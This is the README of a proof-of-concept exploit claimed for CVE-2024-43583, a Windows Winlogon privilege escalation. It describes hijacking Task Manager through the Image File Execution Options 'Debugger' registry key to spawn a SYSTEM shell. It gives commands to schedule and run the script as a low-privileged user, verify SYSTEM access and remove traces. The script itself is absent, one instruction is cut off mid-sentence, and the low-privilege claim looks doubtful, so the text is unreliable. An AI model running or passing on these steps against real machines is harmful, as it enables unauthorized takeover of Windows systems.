
Proof of Concept for CVE-2024-43583
Author: No0B@ckSappi3 Instagram: No0BackSappi3
CVE-2024-43583 is an elevation of privilege vulnerability affecting Microsoft's Winlogon component. Exploiting this flaw allows a low-privileged user to escalate their privileges to SYSTEM, leading to full system compromise.
This proof-of-concept (PoC) leverages Debugger Hijacking via the Windows Image File Execution Options (IFEO) registry key to replace a legitimate system process with a malicious payload.
Windows Versions Affected
Windows 10 (1507 - 22H2) Windows 11 (21H2 - 24H2) Windows Server 2008 SP2 - 2022
This exploit is for educational and research purposes only. Do not use it on unauthorized systems. Misuse of this exploit may be illegal.
Ensure Python is installed on the target system. If not, use the compiled .exe version.
python poc-43583.py
schtasks /create /tn "LowPrivExploit" /tr "C:\Path\To\python.exe C:\Path\To\poc-43583.py" /sc once /st 00:00 /ru lowpriv /f
schtasks /run /tn "LowPrivExploit"
Ctrl + Shift + Esc). If successful, a SYSTEM shell will appear instead.Once the exploit runs, check your privileges:
whoami
Expected Output:
nt authority\system
Re-run the script and select option [2] to remove the hijack.
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f
schtasks /delete /tn "LowPrivExploit" /f
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"